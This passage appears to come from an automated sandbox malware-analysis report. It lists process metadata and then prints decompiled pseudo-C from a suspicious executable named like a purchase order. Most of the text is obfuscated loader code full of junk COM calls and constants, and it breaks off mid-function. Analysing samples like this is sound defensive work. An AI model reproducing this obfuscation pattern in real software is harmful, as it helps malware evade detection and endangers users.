Start time:	13:55:31
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: PO112000891122110.exe PID: 5420 Parent PID: 5640 PO112000891122110.exeCOMMON

Executed Functions

Function 0040BFFA, Relevance: 239.6, APIs: 129, Strings: 7, Instructions: 1630
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040BFFA(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				void* _v56;
				void* _v72;
				short _v76;
				char _v80;
				long long _v88;
				signed int _v92;
				signed int _v96;
				char _v100;
				char _v104;
				signed int _v108;
				char _v112;
				char _v116;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				intOrPtr _v160;
				char _v168;
				char* _v176;
				char _v184;
				intOrPtr _v192;
				char _v200;
				signed int _v208;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char* _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				intOrPtr _v252;
				char _v256;
				char _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				intOrPtr* _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				char _v316;
				char _v332;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				intOrPtr _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				intOrPtr* _v384;
				signed int _v388;
				signed int _v392;
				intOrPtr* _v396;
				signed int _v400;
				intOrPtr* _v404;
				signed int _v408;
				char _v412;
				signed int _v416;
				signed int _v420;
				intOrPtr* _v424;
				signed int _v428;
				intOrPtr* _v432;
				signed int _v436;
				intOrPtr* _v440;
				signed int _v444;
				intOrPtr* _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				signed int _v464;
				intOrPtr* _v468;
				signed int _v472;
				intOrPtr* _v476;
				signed int _v480;
				intOrPtr* _v484;
				signed int _v488;
				intOrPtr* _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				intOrPtr* _v512;
				signed int _v516;
				intOrPtr* _v520;
				signed int _v524;
				intOrPtr* _v528;
				signed int _v532;
				intOrPtr* _v536;
				signed int _v540;
				intOrPtr* _v544;
				signed int _v548;
				intOrPtr* _v552;
				signed int _v556;
				intOrPtr* _v560;
				signed int _v564;
				intOrPtr* _v568;
				signed int _v572;
				signed int _v576;
				intOrPtr* _v580;
				signed int _v584;
				intOrPtr* _v588;
				signed int _v592;
				intOrPtr* _v596;
				signed int _v600;
				intOrPtr* _v604;
				signed int _v608;
				signed int _v612;
				signed int _t815;
				signed int _t822;
				signed int _t826;
				signed int _t830;
				signed int _t834;
				char* _t838;
				signed int _t842;
				signed int _t848;
				signed int _t855;
				signed int _t859;
				signed int _t863;
				signed int _t867;
				char* _t871;
				signed int _t875;
				signed int _t879;
				signed int _t883;
				signed int _t915;
				signed int _t919;
				signed int _t929;
				signed int _t933;
				signed int _t937;
				signed int _t941;
				signed int _t945;
				char* _t949;
				signed int _t953;
				signed int _t957;
				signed int _t961;
				char* _t963;
				signed int _t969;
				signed int _t977;
				char* _t983;
				signed int _t989;
				signed int _t993;
				signed int _t997;
				signed int _t1001;
				signed int _t1005;
				char* _t1009;
				signed int _t1013;
				signed int _t1017;
				signed int _t1021;
				signed int _t1046;
				signed int _t1050;
				signed int _t1054;
				signed int _t1058;
				char* _t1062;
				signed int _t1066;
				signed int _t1071;
				signed int _t1075;
				char* _t1077;
				signed int _t1088;
				signed int _t1100;
				signed int _t1104;
				signed int _t1108;
				signed int _t1112;
				char* _t1116;
				signed int _t1120;
				signed int _t1124;
				signed int _t1128;
				signed int _t1147;
				char* _t1150;
				char* _t1155;
				signed int _t1161;
				signed int _t1166;
				intOrPtr _t1178;
				intOrPtr _t1192;
				intOrPtr _t1196;
				intOrPtr _t1210;
				intOrPtr _t1239;
				intOrPtr _t1251;
				void* _t1285;
				void* _t1287;
				intOrPtr _t1288;
				long long* _t1289;
				void* _t1290;
				intOrPtr* _t1292;
				void* _t1293;
				void* _t1294;
				void* _t1296;
				long long* _t1297;
				intOrPtr* _t1299;

				_t1288 = _t1287 - 0xc;
				 *[fs:0x0] = _t1288;
				L004012A0();
				_v16 = _t1288;
				_v12 = 0x4011c8;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t1285);
				_v176 =  &M0040B054;
				_v184 = 8;
				L004013E4();
				_push( &_v136);
				_push( &_v152); // executed
				L004013EA(); // executed
				_v192 = 0x15;
				_v200 = 0x8002;
				_push( &_v152);
				_t815 =  &_v200;
				_push(_t815);
				L004013F0();
				_v268 = _t815;
				_push( &_v152);
				_push( &_v136);
				_push(2);
				L00401432();
				_t1289 = _t1288 + 0xc;
				if(_v268 != 0) {
					if( *0x4103c4 != 0) {
						_v384 = 0x4103c4;
					} else {
						_push(0x4103c4);
						_push(0x40b088);
						L004013DE();
						_v384 = 0x4103c4;
					}
					_v268 =  *_v384;
					_t1161 =  *((intOrPtr*)( *_v268 + 0x1c))(_v268,  &_v104);
					asm("fclex");
					_v272 = _t1161;
					if(_v272 >= 0) {
						_v388 = _v388 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40b078);
						_push(_v268);
						_push(_v272);
						L004013D8();
						_v388 = _t1161;
					}
					_v276 = _v104;
					_t1166 =  *((intOrPtr*)( *_v276 + 0x64))(_v276, 1,  &_v220);
					asm("fclex");
					_v280 = _t1166;
					if(_v280 >= 0) {
						_v392 = _v392 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x40b098);
						_push(_v276);
						_push(_v280);
						L004013D8();
						_v392 = _t1166;
					}
					_v76 = _v220;
					L004013D2();
				}
				if( *0x410010 != 0) {
					_v396 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a4c4);
					L004013DE();
					_v396 = 0x410010;
				}
				_t822 =  &_v104;
				L004013CC();
				_v268 = _t822;
				_t826 =  *((intOrPtr*)( *_v268 + 0x48))(_v268,  &_v92, _t822,  *((intOrPtr*)( *((intOrPtr*)( *_v396)) + 0x2fc))( *_v396));
				asm("fclex");
				_v272 = _t826;
				if(_v272 >= 0) {
					_v400 = _v400 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x40b0a8);
					_push(_v268);
					_push(_v272);
					L004013D8();
					_v400 = _t826;
				}
				if( *0x410010 != 0) {
					_v404 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a4c4);
					L004013DE();
					_v404 = 0x410010;
				}
				_t830 =  &_v108;
				L004013CC();
				_v276 = _t830;
				_t834 =  *((intOrPtr*)( *_v276 + 0x48))(_v276,  &_v96, _t830,  *((intOrPtr*)( *((intOrPtr*)( *_v404)) + 0x314))( *_v404));
				asm("fclex");
				_v280 = _t834;
				if(_v280 >= 0) {
					_v408 = _v408 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x40b0b8);
					_push(_v276);
					_push(_v280);
					L004013D8();
					_v408 = _t834;
				}
				if( *0x410010 != 0) {
					_v412 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a4c4);
					L004013DE();
					_v412 = 0x410010;
				}
				_t1178 =  *((intOrPtr*)( *_v412));
				_t838 =  &_v112;
				L004013CC();
				_v284 = _t838;
				_t842 =  *((intOrPtr*)( *_v284 + 0xe8))(_v284,  &_v232, _t838,  *((intOrPtr*)(_t1178 + 0x31c))( *_v412));
				asm("fclex");
				_v288 = _t842;
				if(_v288 >= 0) {
					_v416 = _v416 & 0x00000000;
				} else {
					_push(0xe8);
					_push(0x40b0c8);
					_push(_v284);
					_push(_v288);
					L004013D8();
					_v416 = _t842;
				}
				_v344 = _v96;
				_v96 = _v96 & 0x00000000;
				_v128 = _v344;
				_v136 = 8;
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t1289 =  *0x4011c0;
				_t848 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, _v92, _t1178, _t1178, 0x10, 0x514f93, _v232);
				_v292 = _t848;
				if(_v292 >= 0) {
					_v420 = _v420 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x40ad7c);
					_push(_a4);
					_push(_v292);
					L004013D8();
					_v420 = _t848;
				}
				L00401462();
				_push( &_v112);
				_push( &_v108);
				_push( &_v104);
				_push(3);
				L004013C6();
				_t1290 = _t1289 + 0x10;
				L00401450();
				if( *0x410010 != 0) {
					_v424 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a4c4);
					L004013DE();
					_v424 = 0x410010;
				}
				_t855 =  &_v104;
				L004013CC();
				_v268 = _t855;
				_t859 =  *((intOrPtr*)( *_v268 + 0xf0))(_v268,  &_v108, _t855,  *((intOrPtr*)( *((intOrPtr*)( *_v424)) + 0x314))( *_v424));
				asm("fclex");
				_v272 = _t859;
				if(_v272 >= 0) {
					_v428 = _v428 & 0x00000000;
				} else {
					_push(0xf0);
					_push(0x40b0b8);
					_push(_v268);
					_push(_v272);
					L004013D8();
					_v428 = _t859;
				}
				if( *0x410010 != 0) {
					_v432 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a4c4);
					L004013DE();
					_v432 = 0x410010;
				}
				_t863 =  &_v112;
				L004013CC();
				_v276 = _t863;
				_t867 =  *((intOrPtr*)( *_v276 + 0x48))(_v276,  &_v92, _t863,  *((intOrPtr*)( *((intOrPtr*)( *_v432)) + 0x31c))( *_v432));
				asm("fclex");
				_v280 = _t867;
				if(_v280 >= 0) {
					_v436 = _v436 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x40b0c8);
					_push(_v276);
					_push(_v280);
					L004013D8();
					_v436 = _t867;
				}
				if( *0x410010 != 0) {
					_v440 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a4c4);
					L004013DE();
					_v440 = 0x410010;
				}
				_t871 =  &_v116;
				L004013CC();
				_v284 = _t871;
				_t875 =  *((intOrPtr*)( *_v284 + 0x128))(_v284,  &_v220, _t871,  *((intOrPtr*)( *((intOrPtr*)( *_v440)) + 0x300))( *_v440));
				asm("fclex");
				_v288 = _t875;
				if(_v288 >= 0) {
					_v444 = _v444 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x40b0a8);
					_push(_v284);
					_push(_v288);
					L004013D8();
					_v444 = _t875;
				}
				if( *0x410010 != 0) {
					_v448 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a4c4);
					L004013DE();
					_v448 = 0x410010;
				}
				_t1192 =  *((intOrPtr*)( *_v448));
				_t879 =  &_v120;
				L004013CC();
				_v292 = _t879;
				_t883 =  *((intOrPtr*)( *_v292 + 0x1dc))(_v292,  &_v96, _t879,  *((intOrPtr*)(_t1192 + 0x300))( *_v448));
				asm("fclex");
				_v296 = _t883;
				if(_v296 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(0x1dc);
					_push(0x40b0a8);
					_push(_v292);
					_push(_v296);
					L004013D8();
					_v452 = _t883;
				}
				_v348 = _v96;
				_v96 = _v96 & 0x00000000;
				_v160 = _v348;
				_v168 = 8;
				_v176 = 0x5a42e0;
				_v184 = 3;
				_v232 = 0x3554e3;
				_v228 = 0x17dd;
				_v224 = _v220;
				_v352 = _v92;
				_v92 = _v92 & 0x00000000;
				_v144 = _v352;
				_v152 = 8;
				_v356 = _v108;
				_v108 = _v108 & 0x00000000;
				_v128 = _v356;
				_v136 = 9;
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v240 =  *0x4011bc;
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v136, 0x10,  &_v224, _t1192,  &_v228,  &M0040AF20,  &_v232, 0x10,  &_v168);
				L004013C6();
				L00401432();
				_t1292 = _t1290 + 0x24;
				 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v136, 3,  &_v136,  &_v152,  &_v168, 4,  &_v104,  &_v112,  &_v116,  &_v120);
				L004013C0();
				if( *0x410010 != 0) {
					_v456 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a4c4);
					L004013DE();
					_v456 = 0x410010;
				}
				_t1196 =  *((intOrPtr*)( *_v456));
				_t915 =  &_v104;
				L004013CC();
				_v268 = _t915;
				_t919 =  *((intOrPtr*)( *_v268 + 0x48))(_v268,  &_v92, _t915,  *((intOrPtr*)(_t1196 + 0x304))( *_v456));
				asm("fclex");
				_v272 = _t919;
				if(_v272 >= 0) {
					_v460 = _v460 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x40b0a8);
					_push(_v268);
					_push(_v272);
					L004013D8();
					_v460 = _t919;
				}
				_v192 = 0x7cf5f3;
				_v200 = 3;
				_v220 = 0x74c1;
				_v176 = L"overstiges";
				_v184 = 8;
				_v360 = _v92;
				_v92 = _v92 & 0x00000000;
				_v128 = _v360;
				_v136 = 8;
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t1292 =  *0x4011b8;
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t929 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 0x10, 0x10, _t1196,  &_v220, 0x39ff, 0x10, 0x667a4db0, 0x5b07,  &_v256);
				_v276 = _t929;
				if(_v276 >= 0) {
					_v464 = _v464 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x40ad7c);
					_push(_a4);
					_push(_v276);
					L004013D8();
					_v464 = _t929;
				}
				_v88 = _v256;
				L004013D2();
				L00401450();
				if( *0x410010 != 0) {
					_v468 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a4c4);
					L004013DE();
					_v468 = 0x410010;
				}
				_t933 =  &_v104;
				L004013CC();
				_v268 = _t933;
				_t937 =  *((intOrPtr*)( *_v268 + 0xa0))(_v268,  &_v220, _t933,  *((intOrPtr*)( *((intOrPtr*)( *_v468)) + 0x314))( *_v468));
				asm("fclex");
				_v272 = _t937;
				if(_v272 >= 0) {
					_v472 = _v472 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x40b0b8);
					_push(_v268);
					_push(_v272);
					L004013D8();
					_v472 = _t937;
				}
				if( *0x410010 != 0) {
					_v476 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a4c4);
					L004013DE();
					_v476 = 0x410010;
				}
				_t941 =  &_v108;
				L004013CC();
				_v276 = _t941;
				_t945 =  *((intOrPtr*)( *_v276 + 0x1a0))(_v276,  &_v224, _t941,  *((intOrPtr*)( *((intOrPtr*)( *_v476)) + 0x304))( *_v476));
				asm("fclex");
				_v280 = _t945;
				if(_v280 >= 0) {
					_v480 = _v480 & 0x00000000;
				} else {
					_push(0x1a0);
					_push(0x40b0a8);
					_push(_v276);
					_push(_v280);
					L004013D8();
					_v480 = _t945;
				}
				if( *0x410010 != 0) {
					_v484 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a4c4);
					L004013DE();
					_v484 = 0x410010;
				}
				_t949 =  &_v112;
				L004013CC();
				_v284 = _t949;
				_t953 =  *((intOrPtr*)( *_v284 + 0x128))(_v284,  &_v232, _t949,  *((intOrPtr*)( *((intOrPtr*)( *_v484)) + 0x318))( *_v484));
				asm("fclex");
				_v288 = _t953;
				if(_v288 >= 0) {
					_v488 = _v488 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x40b0b8);
					_push(_v284);
					_push(_v288);
					L004013D8();
					_v488 = _t953;
				}
				if( *0x410010 != 0) {
					_v492 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a4c4);
					L004013DE();
					_v492 = 0x410010;
				}
				_t1210 =  *((intOrPtr*)( *_v492));
				_t957 =  &_v116;
				L004013CC();
				_v292 = _t957;
				_t961 =  *((intOrPtr*)( *_v292 + 0xf0))(_v292,  &_v120, _t957,  *((intOrPtr*)(_t1210 + 0x318))( *_v492));
				asm("fclex");
				_v296 = _t961;
				if(_v296 >= 0) {
					_v496 = _v496 & 0x00000000;
				} else {
					_push(0xf0);
					_push(0x40b0b8);
					_push(_v292);
					_push(_v296);
					L004013D8();
					_v496 = _t961;
				}
				L004013BA();
				_t1293 = _t1292 + 0x10;
				_t963 =  &_v136;
				L004013B4();
				_v240 = _t963;
				_v236 = 0x6b5bc3;
				_v256 =  *0x4011b0;
				_v412 =  *0x4011a8;
				_t969 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v256, 0x31f0, _v220, _v224,  &_v236, _v232, _t1210, _t1210,  &_v240, 0x60d, 0x5cfc, _t963,  &_v136, _v120, 0, 0);
				_v300 = _t969;
				if(_v300 >= 0) {
					_v500 = _v500 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x40ad7c);
					_push(_a4);
					_push(_v300);
					L004013D8();
					_v500 = _t969;
				}
				L004013C6();
				_t1294 = _t1293 + 0x18;
				L00401450();
				_t977 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 5,  &_v104,  &_v108,  &_v112,  &_v116,  &_v120);
				asm("fclex");
				_v268 = _t977;
				if(_v268 >= 0) {
					_v504 = _v504 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x40ad4c);
					_push(_a4);
					_push(_v268);
					L004013D8();
					_v504 = _t977;
				}
				_v176 = 1;
				_v184 = 2;
				_v192 = 0x5f7a;
				_v200 = 2;
				_v208 = _v208 & 0x00000000;
				_v216 = 2;
				_push( &_v184);
				_push( &_v200);
				_push( &_v216);
				_push( &_v332);
				_push( &_v316);
				_t983 =  &_v40;
				_push(_t983);
				L004013AE();
				_v364 = _t983;
				while(_v364 != 0) {
					_v176 = L"RRETS";
					_v184 = 8;
					L004013E4();
					_v264 =  *0x4011a0;
					_v256 = 0x418e7d50;
					_v252 = 0x5af3;
					_t989 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v256, 0x4d7a,  &_v264, 0x6e4acb,  &_v136);
					_v268 = _t989;
					if(_v268 >= 0) {
						_v508 = _v508 & 0x00000000;
					} else {
						_push(0x708);
						_push(0x40ad7c);
						_push(_a4);
						_push(_v268);
						L004013D8();
						_v508 = _t989;
					}
					L00401450();
					if( *0x410010 != 0) {
						_v512 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x40a4c4);
						L004013DE();
						_v512 = 0x410010;
					}
					_t993 =  &_v104;
					L004013CC();
					_v268 = _t993;
					_t997 =  *((intOrPtr*)( *_v268 + 0x68))(_v268,  &_v232, _t993,  *((intOrPtr*)( *((intOrPtr*)( *_v512)) + 0x314))( *_v512));
					asm("fclex");
					_v272 = _t997;
					if(_v272 >= 0) {
						_v516 = _v516 & 0x00000000;
					} else {
						_push(0x68);
						_push(0x40b0b8);
						_push(_v268);
						_push(_v272);
						L004013D8();
						_v516 = _t997;
					}
					if( *0x410010 != 0) {
						_v520 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x40a4c4);
						L004013DE();
						_v520 = 0x410010;
					}
					_t1001 =  &_v108;
					L004013CC();
					_v276 = _t1001;
					_t1005 =  *((intOrPtr*)( *_v276 + 0x90))(_v276,  &_v220, _t1001,  *((intOrPtr*)( *((intOrPtr*)( *_v520)) + 0x31c))( *_v520));
					asm("fclex");
					_v280 = _t1005;
					if(_v280 >= 0) {
						_v524 = _v524 & 0x00000000;
					} else {
						_push(0x90);
						_push(0x40b0c8);
						_push(_v276);
						_push(_v280);
						L004013D8();
						_v524 = _t1005;
					}
					if( *0x410010 != 0) {
						_v528 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x40a4c4);
						L004013DE();
						_v528 = 0x410010;
					}
					_t1009 =  &_v112;
					L004013CC();
					_v284 = _t1009;
					_t1013 =  *((intOrPtr*)( *_v284 + 0xf8))(_v284,  &_v92, _t1009,  *((intOrPtr*)( *((intOrPtr*)( *_v528)) + 0x308))( *_v528));
					asm("fclex");
					_v288 = _t1013;
					if(_v288 >= 0) {
						_v532 = _v532 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x40b0a8);
						_push(_v284);
						_push(_v288);
						L004013D8();
						_v532 = _t1013;
					}
					if( *0x410010 != 0) {
						_v536 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x40a4c4);
						L004013DE();
						_v536 = 0x410010;
					}
					_t1017 =  &_v116;
					L004013CC();
					_v292 = _t1017;
					_t1021 =  *((intOrPtr*)( *_v292 + 0x1dc))(_v292,  &_v96, _t1017,  *((intOrPtr*)( *((intOrPtr*)( *_v536)) + 0x308))( *_v536));
					asm("fclex");
					_v296 = _t1021;
					if(_v296 >= 0) {
						_v540 = _v540 & 0x00000000;
					} else {
						_push(0x1dc);
						_push(0x40b0a8);
						_push(_v292);
						_push(_v296);
						L004013D8();
						_v540 = _t1021;
					}
					_v144 = 0x85aaa;
					_v152 = 3;
					_v192 = 0x791fc7;
					_v200 = 3;
					_v368 = _v96;
					_v96 = _v96 & 0x00000000;
					_v128 = _v368;
					_v136 = 8;
					_v240 =  *0x401198;
					_v372 = _v92;
					_v92 = _v92 & 0x00000000;
					L0040145C();
					_v256 =  *0x401190;
					_v236 = _v232;
					_v176 = 0x51ddc9;
					_v184 = 3;
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v592 =  *0x401188;
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *_a4 + 0x724))(_a4, 0x10,  &_v236, _v220,  &_v256,  &_v100,  &_v100,  &_v240,  &_v136, 0x10,  &_v152);
					L00401462();
					_push( &_v116);
					_push( &_v112);
					_push( &_v108);
					_push( &_v104);
					_push(4);
					L004013C6();
					_push( &_v152);
					_push( &_v136);
					_push(2);
					L00401432();
					_t1296 = _t1294 + 0x20;
					if( *0x410010 != 0) {
						_v544 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x40a4c4);
						L004013DE();
						_v544 = 0x410010;
					}
					_t1046 =  &_v104;
					L004013CC();
					_v268 = _t1046;
					_t1050 =  *((intOrPtr*)( *_v268 + 0x48))(_v268,  &_v92, _t1046,  *((intOrPtr*)( *((intOrPtr*)( *_v544)) + 0x308))( *_v544));
					asm("fclex");
					_v272 = _t1050;
					if(_v272 >= 0) {
						_v548 = _v548 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x40b0a8);
						_push(_v268);
						_push(_v272);
						L004013D8();
						_v548 = _t1050;
					}
					if( *0x410010 != 0) {
						_v552 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x40a4c4);
						L004013DE();
						_v552 = 0x410010;
					}
					_t1054 =  &_v108;
					L004013CC();
					_v276 = _t1054;
					_t1058 =  *((intOrPtr*)( *_v276 + 0xe8))(_v276,  &_v220, _t1054,  *((intOrPtr*)( *((intOrPtr*)( *_v552)) + 0x318))( *_v552));
					asm("fclex");
					_v280 = _t1058;
					if(_v280 >= 0) {
						_v556 = _v556 & 0x00000000;
					} else {
						_push(0xe8);
						_push(0x40b0b8);
						_push(_v276);
						_push(_v280);
						L004013D8();
						_v556 = _t1058;
					}
					if( *0x410010 != 0) {
						_v560 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x40a4c4);
						L004013DE();
						_v560 = 0x410010;
					}
					_t1062 =  &_v112;
					L004013CC();
					_v284 = _t1062;
					_t1066 =  *((intOrPtr*)( *_v284 + 0x58))(_v284,  &_v116, _t1062,  *((intOrPtr*)( *((intOrPtr*)( *_v560)) + 0x31c))( *_v560));
					asm("fclex");
					_v288 = _t1066;
					if(_v288 >= 0) {
						_v564 = _v564 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x40b0c8);
						_push(_v284);
						_push(_v288);
						L004013D8();
						_v564 = _t1066;
					}
					_push(0);
					_push(0);
					_push(_v116);
					_push( &_v152);
					L004013BA();
					_t1297 = _t1296 + 0x10;
					if( *0x410010 != 0) {
						_v568 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x40a4c4);
						L004013DE();
						_v568 = 0x410010;
					}
					_t1239 =  *((intOrPtr*)( *_v568));
					_t1071 =  &_v120;
					L004013CC();
					_v292 = _t1071;
					_t1075 =  *((intOrPtr*)( *_v292 + 0x60))(_v292,  &_v232, _t1071,  *((intOrPtr*)(_t1239 + 0x314))( *_v568));
					asm("fclex");
					_v296 = _t1075;
					if(_v296 >= 0) {
						_v572 = _v572 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x40b0b8);
						_push(_v292);
						_push(_v296);
						L004013D8();
						_v572 = _t1075;
					}
					_v240 = _v232;
					_t1077 =  &_v152;
					L004013B4();
					_v236 = _t1077;
					_v376 = _v92;
					_v92 = _v92 & 0x00000000;
					_v128 = _v376;
					_v136 = 8;
					_v264 =  *0x401180;
					_v256 = 0x754c8ed0;
					_v252 = 0x5afc;
					 *_t1297 =  *0x401178;
					_t1088 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, 0x2e2313c0, 0x5af8,  &_v256,  &_v264,  &_v136, 0x683d, _v220,  &_v236, _t1239, _t1239,  &_v240,  &_v244, _t1077);
					_v300 = _t1088;
					if(_v300 >= 0) {
						_v576 = _v576 & 0x00000000;
					} else {
						_push(0x70c);
						_push(0x40ad7c);
						_push(_a4);
						_push(_v300);
						L004013D8();
						_v576 = _t1088;
					}
					_v80 = _v244;
					_push( &_v116);
					_push( &_v120);
					_push( &_v112);
					_push( &_v108);
					_push( &_v104);
					_push(5);
					L004013C6();
					_push( &_v152);
					_push( &_v136);
					_push(2);
					L00401432();
					_t1299 = _t1297 + 0x24;
					if( *0x410010 != 0) {
						_v580 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x40a4c4);
						L004013DE();
						_v580 = 0x410010;
					}
					_t1100 =  &_v104;
					L004013CC();
					_v268 = _t1100;
					_t1104 =  *((intOrPtr*)( *_v268 + 0x170))(_v268,  &_v108, _t1100,  *((intOrPtr*)( *((intOrPtr*)( *_v580)) + 0x304))( *_v580));
					asm("fclex");
					_v272 = _t1104;
					if(_v272 >= 0) {
						_v584 = _v584 & 0x00000000;
					} else {
						_push(0x170);
						_push(0x40b0a8);
						_push(_v268);
						_push(_v272);
						L004013D8();
						_v584 = _t1104;
					}
					if( *0x410010 != 0) {
						_v588 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x40a4c4);
						L004013DE();
						_v588 = 0x410010;
					}
					_t1108 =  &_v112;
					L004013CC();
					_v276 = _t1108;
					_t1112 =  *((intOrPtr*)( *_v276 + 0x110))(_v276,  &_v232, _t1108,  *((intOrPtr*)( *((intOrPtr*)( *_v588)) + 0x318))( *_v588));
					asm("fclex");
					_v280 = _t1112;
					if(_v280 >= 0) {
						_v592 = _v592 & 0x00000000;
					} else {
						_push(0x110);
						_push(0x40b0b8);
						_push(_v276);
						_push(_v280);
						L004013D8();
						_v592 = _t1112;
					}
					if( *0x410010 != 0) {
						_v596 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x40a4c4);
						L004013DE();
						_v596 = 0x410010;
					}
					_t1116 =  &_v116;
					L004013CC();
					_v284 = _t1116;
					_t1120 =  *((intOrPtr*)( *_v284 + 0x70))(_v284,  &_v236, _t1116,  *((intOrPtr*)( *((intOrPtr*)( *_v596)) + 0x318))( *_v596));
					asm("fclex");
					_v288 = _t1120;
					if(_v288 >= 0) {
						_v600 = _v600 & 0x00000000;
					} else {
						_push(0x70);
						_push(0x40b0b8);
						_push(_v284);
						_push(_v288);
						L004013D8();
						_v600 = _t1120;
					}
					if( *0x410010 != 0) {
						_v604 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x40a4c4);
						L004013DE();
						_v604 = 0x410010;
					}
					_t1251 =  *((intOrPtr*)( *_v604));
					_t1124 =  &_v120;
					L004013CC();
					_v292 = _t1124;
					_t1128 =  *((intOrPtr*)( *_v292 + 0x128))(_v292,  &_v240, _t1124,  *((intOrPtr*)(_t1251 + 0x318))( *_v604));
					asm("fclex");
					_v296 = _t1128;
					if(_v296 >= 0) {
						_v608 = _v608 & 0x00000000;
					} else {
						_push(0x128);
						_push(0x40b0b8);
						_push(_v292);
						_push(_v296);
						L004013D8();
						_v608 = _t1128;
					}
					_v248 = _v240;
					_v244 =  *0x401170;
					_v176 = _v232;
					_v184 = 3;
					_v380 = _v108;
					_v108 = _v108 & 0x00000000;
					_v128 = _v380;
					_v136 = 9;
					 *_t1299 = _v236;
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *_t1299 =  *0x40116c;
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *_a4 + 0x728))(_a4, 0x10, 0x5d72, _t1251, 0x10,  &_v244, _t1251,  &_v248);
					L004013C6();
					_t1294 = _t1299 + 0x14;
					L00401450();
					_t1147 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v136, 4,  &_v104,  &_v112,  &_v116,  &_v120);
					_v268 = _t1147;
					if(_v268 >= 0) {
						_v612 = _v612 & 0x00000000;
					} else {
						_push(0x710);
						_push(0x40ad7c);
						_push(_a4);
						_push(_v268);
						L004013D8();
						_v612 = _t1147;
					}
					L004013C0();
					_push( &_v332);
					_push( &_v316);
					_t1150 =  &_v40;
